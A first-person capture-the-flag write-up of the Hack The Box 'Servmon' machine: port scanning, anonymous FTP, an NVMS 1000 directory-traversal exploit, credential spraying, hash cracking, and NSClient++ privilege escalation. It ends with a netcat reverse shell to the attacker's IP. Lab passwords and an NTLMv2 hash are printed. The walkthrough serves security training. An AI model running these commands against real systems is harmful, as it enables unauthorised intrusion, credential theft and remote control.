Enumeration
nmap
I start with a nmap scan - sudo nmap -sC -sV -Pn -O ; sleep 5; sudo nmap -p- -Pn; sleep 5; sudo nmap -sU -Pn
nmap scan results
Nmap scan report for 10.129.227.77
Host is up (0.029s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 07:35PM <DIR> Users
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
| 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_ 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp open http
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open tcpwrapped
8443/tcp open ssl/https-alt
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.95%I=7%D=4/14%Time=69DE257A%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.95%T=SSL%I=7%D=4/14%Time=69DE2582%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x1
SF:8\x1b\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x
SF:2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.
SF:1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(R
SF:TSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocumen
SF:t\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length
SF::\x2018\r\n\r\nDocument\x20not\x20found");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/14%OT=21%CT=1%CU=35362%PV=Y%DS=2%DC=I%G=Y%TM=69DE25E
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=102%TI=I%CI=I%II=I%SS=S%TS=
OS:U)SEQ(SP=102%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=104%GCD=1%ISR
OS:=10F%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=105%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS
OS:=S%TS=U)SEQ(SP=107%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M4E2NW8
OS:NNS%O2=M4E2NW8NNS%O3=M4E2NW8%O4=M4E2NW8NNS%O5=M4E2NW8NNS%O6=M4E2NNS)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M4E2NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)
OS:U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
OS:FI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-04-14T11:32:53
|_ start_date: N/A
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.15 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-14 13:33 CEST
Nmap scan report for 10.129.227.77
Host is up (0.029s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5666/tcp open nrpe
6063/tcp open x11
6699/tcp open napster
8443/tcp open https-alt
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 26.55 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-14 13:33 CEST
Nmap scan report for 10.129.227.77
Host is up (0.029s latency).
Not shown: 993 closed udp ports (port-unreach)
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
500/udp open|filtered isakmp
4500/udp open|filtered nat-t-ike
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr
OSINT & port 80
Briefly - Servmon is a service that monitors websites, servers, and sends alerts depending on how it’s setup. NVMS 1000 is a tool from Voltex Security Systems, from what I see them make like surveillance cameras and other tools.
The website looks like a monitoring dashboard for those surveillance tooling. Basic default credentials do not work. I ran ffuf to look for subdomains and other directories.
ffuf -u 'http://10.129.227.77/Pages/FUZZ.htm' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt and ffuf -u 'http://10.129.227.77/' -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H 'Host: FUZZ.10.129.227.77' -fs 340 should do an alright basic enumerator, however I feel like I need to enumerate directories better.
I found no other subdomains and some directories:
login [Status: 200, Size: 2105, Words: 69, Lines: 60, Duration: 44ms]
main [Status: 200, Size: 6126, Words: 1256, Lines: 142, Duration: 73ms]
Login [Status: 200, Size: 2105, Words: 69, Lines: 60, Duration: 40ms]
Main [Status: 200, Size: 6126, Words: 1256, Lines: 142, Duration: 74ms]
changePassword [Status: 200, Size: 938, Words: 49, Lines: 43, Duration: 46ms]
MAIN [Status: 200, Size: 6126, Words: 1256, Lines: 142, Duration: 48ms]
changepassword [Status: 200, Size: 938, Words: 49, Lines: 43, Duration: 74ms]
ChangePassword [Status: 200, Size: 938, Words: 49, Lines: 43, Duration: 79ms]
LogIn [Status: 200, Size: 2105, Words: 69, Lines: 60, Duration: 41ms]
%3FRID%3D2671 [Status: 200, Size: 118, Words: 3, Lines: 5, Duration: 38ms]
LOGIN [Status: 200, Size: 2105, Words: 69, Lines: 60, Duration: 36ms]
login%3f [Status: 200, Size: 118, Words: 3, Lines: 5, Duration: 82ms]When I accessed that website I was automatically moved to http://10.129.227.77/Pages/login.htm which both takes me into “Pages” and assumes a “.htm” extension which isn’t something I see often. I can also google around and see what webserver behaves like that as Wappalyzer only find JQuery.
I will enumerate other possible extensions with and look for other folders besides “Pages” with ffuf in a second, as there are a lot of other ports and I think I can find some low-hanging fruit before a full enumeration.
There is an anonymous FTP access. Inside I found a folder “Users” containing two users - Nadine and Nathan.
In Nathans file I found a “Confidential.txt” file containing this message from Nadine:
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine% And as for Nadine, there was a to-do file containing:
1) Change the password for NVMS - Complete
2) Upload the passwords
3) Remove public access to NVMS
4) Place the secret files in SharePoint% In this context “NVMS” likely means a network video management system which is a program used to manage CCTV/IP cameras.
NSClient likely refers to NSClient++, a Windows agent used with Nagios for monitoring.
Nagios is a monitoring tool used to track servers, services, and network devices. Nagios is very similar to servmon so I wonder if I will see both tools or maybe some hybrid. Also, I wonder if there will be some CCTV footage - let’s dig and find out.
SMB null session is disabled, I tried basic creds for the known users and didn’t manage to get in.
On port 8443 there is NSClient++ dashboard opened when access with HTTPS. When I accessed it I got a white page implying that I can’t see its content without some authentication. After I refreshed it a couple of times I got a login screen which I didn’t see before.
I found this info about passwords.
The NSClient++ password can be found by running:
nscp web -- password --display
or you can sett a new password:
nscp web -- password --set new-passwordLooking at the information i gathered I should likely aim for Nathans Desktop, but I’m not sure how can I get there right now. Maybe with SMB if his desktop is the share, but without BFing and a bit of luck this doesn’t seem plausible.
I can’t brute rid with smb, likely the guest account is disabled.
I ran hydra 10.129.28.144 -s 8443 -S -L users -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10k-most-common.txt http-get "/auth/token?password=^PASS^:F=403 Your not allowed" on the HTTPS port just so I have some scans running in the background.
The other directories I found don’t give much assistance, but some of them seem unfinished or not working correctly.
I also started to BF extensions with ffuf -u http://10.129.28.144/Pages/loginFUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/web-extensions-big.txt and look for other directories than “Pages” with ffuf -u 'http://10.129.28.144/FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 118.
Hydra didn’t find any common passwords.
Other root directories:
%3FRID%3D2671 [Status: 200, Size: 340, Words: 32, Lines: 13, Duration: 51ms]Weird thing about this directory is that when I use it, it constantly refreshes and copies it’s subdirectory in the url in each iteration. Decoded means “?RID=2671” which is interesting.
I didn’t find any other extensions.
I just notices that there is LLMNR running on the host and no DNS. I will keep responder running in the background.
I tested basic SSTI and SQL injections on the authentications. One thing to check would be sqlmap but I don’t feel like this is the right way.
Foothold
Searchsploit found some public exploits for nvms-1000
NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer Overflow | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.pyYup, I found a nifty exploit on github for unwanted directory traversal. I read how it works, run it and found some creds!
azaeir@parrot (~/Desktop/htb/machines/servmon/NVMS1000-Exploit): python3 nvms.py 10.129.28.144 /Users/Nathan/Desktop/Passwords.txt
[+] DT Attack Succeeded
[+] File Content
++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++ END ++++++++++I user users.txt file which holds both users - lower, and upper case versions - and run it through netexec against a list of passwords. There are two hits for nadine, against SMB and SSH with L1k3B1gBut7s@W0rk.
Nadine has read access to IPC$ but sadly I can’t view any content. I did manage to run a rid bruteforce - here are the results:
SMB 10.129.28.144 445 SERVMON 500: SERVMON\Administrator (SidTypeUser)
SMB 10.129.28.144 445 SERVMON 501: SERVMON\Guest (SidTypeUser)
SMB 10.129.28.144 445 SERVMON 503: SERVMON\DefaultAccount (SidTypeUser)
SMB 10.129.28.144 445 SERVMON 504: SERVMON\WDAGUtilityAccount (SidTypeUser)
SMB 10.129.28.144 445 SERVMON 513: SERVMON\None (SidTypeGroup)
SMB 10.129.28.144 445 SERVMON 1000: SERVMON\Nathan (SidTypeUser)
SMB 10.129.28.144 445 SERVMON 1001: SERVMON\Nadine (SidTypeUser)There are no interesting, custom, unknown users. I counted that maybe there will be a user with RID 2671 but sadly that’s not the case.
SSH access worked and I found a user flag on Nadine’s Desktop.
In the root of the filesystem there is a RecData which holds what looks like to be SQLite database files:
RecordInfoDB.db3
RecordInfoDB.db3-journalI downloaded them with scp and enumerated with sqlite3 but they are empty. From the schema and general context it looks like a database which would hold surveillance videos or data.
Looking further, in program files I found folders for both NSClient++ and NVMS1000. I looked through them and noted more interesting files, found some certificates with private keys as well/
C:\Program Files\NSClient++\security
C:\Program Files\NSClient++\scripts\customI noted that down and searched for any simpler priv-esc possibilities.
I decided to run WinPEAS and look what it finds.
+----------¦ Enumerating NTLM Settings
LanmanCompatibilityLevel : (Send NTLMv2 response only - Win7+ default)
NTLM Signing Settings
ClientRequireSigning : False
ClientNegotiateSigning : True
ServerRequireSigning : False
ServerNegotiateSigning : False
LdapSigning : Negotiate signing (Negotiate signing)
---
+----------¦ Enumerating Named Pipes
Name CurrentUserPerms Sddl
eventlog Everyone [Allow: WriteData/CreateFiles] O:LSG:LSD:P(A;;0x1201
9b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)
vgauth-service Everyone [Allow: WriteData/CreateFiles] O:BAG:SYD:P(A;;0x1201
9f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)
---
Folder: C:\Users\Nadine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
FolderPerms: Nadine [Allow: AllAccess]
File: C:\Users\Nadine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected) - C:\Users\Nadine\AppData\Roaming\M
icrosoft\Windows,C:\Users\Nadine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
FilePerms: Nadine [Allow: AllAccess]
Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
---
+----------¦ Enumerating Security Packages Credentials
Version: NetNTLMv2
Hash: Nadine::SERVMON:1122334455667788:847f1545e73196bfcc29b0eccb1a34dc:0101000000000000b7fb082aaacddc01e27df20ae5988a5d000000000800300030000000000000000000000000200000123997709cfe96c3cf5a71ae9cae03f41156e02642aed9e3642bae814b91bb1d0a00100000000000000000000000000000000000090000000000000000000000This is a summery of the most interesting finds:
- Judging by the NTLM settings, there is a possibility of a relay attack
- It found some named pipes, but nothing that screams direct priv-esc really
- There is a chance for persistence with the rights to the startup folder which is nice
- WinPEAS also found an NTLMv2 hash in packages credentials (in memory)
Let’s try to crack that NTLMv2 hash - hashcat -m 5600 nadine.hash /usr/share/wordlists/SecLists/Passwords/Common-Credentials/xato-net-10-million-passwords.txt
Sadly, I didn’t manage crack it.
Privilege Escalation
Learning from the foothold, I looked for any public exploits for both NVMS1000 and NSClient++ - seems like I found one for the latter.
I need to verify the version to make sure.
nadine@SERVMON C:\Program Files\NSClient++>.\nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64Yes, there is an exploit. Here’s a summery from the script itself:
# NSClient++ is a monitoring agent that has the option to run external scripts.
# This feature can allow an attacker, given they have credentials, the ability to execute
# arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System bt
# Default, this leads to privileged code execution.I roughly followed the instruction from git, here is what I did.
- Get the web administrator password
nadine@SERVMON C:\Program Files\NSClient++>type nsclient.iniand it shows a password in the config -Web Admin password: ew2x6SsGTxjRwXOT - Download the exploit from here
- Created a temp file in the root directory with
mkdir tempand uploaded nc.exe withscp ~/Desktop/tools/nc.exe nadine@10.129.227.77:C:/temp/ - Did local port forwarding with
ssh -L 8443:127.0.0.1:8443 nadine@10.129.227.77 - Lunched a listener on the attack host with
nc -lnvp 1337 - Renamed the script from “48360.txt.txt” to “48360.py” with the
mvcommand - Run the script with this command
python3 48360.py -t 127.0.0.1 -P 8443 -p "ew2x6SsGTxjRwXOT" -c "C:\temp\nc.exe 10.10.15.189 1337 -e cmd.exe"
With these steps I managed to get a callback on my listener as NT SYSTEM and I found a root flag on admin’s desktop.
I also created an issue for the author of this exploit to make the official instruction simpler to follow along.
Closing Thoughts
Servmon is a relatively simple machine. There are two public exploits that can be used to finish it and a Metasploit script for even less hustle. The level of complexity highly depends on your approach. Overall a good machine to try out.
Regarding lessons learned, I again spent too much time looking for a ton of different possible ways to pivot and didn’t focus on the most obvious one. Detailed enumeration is very important but I should see until the end each vector before moving to another just for the time sake.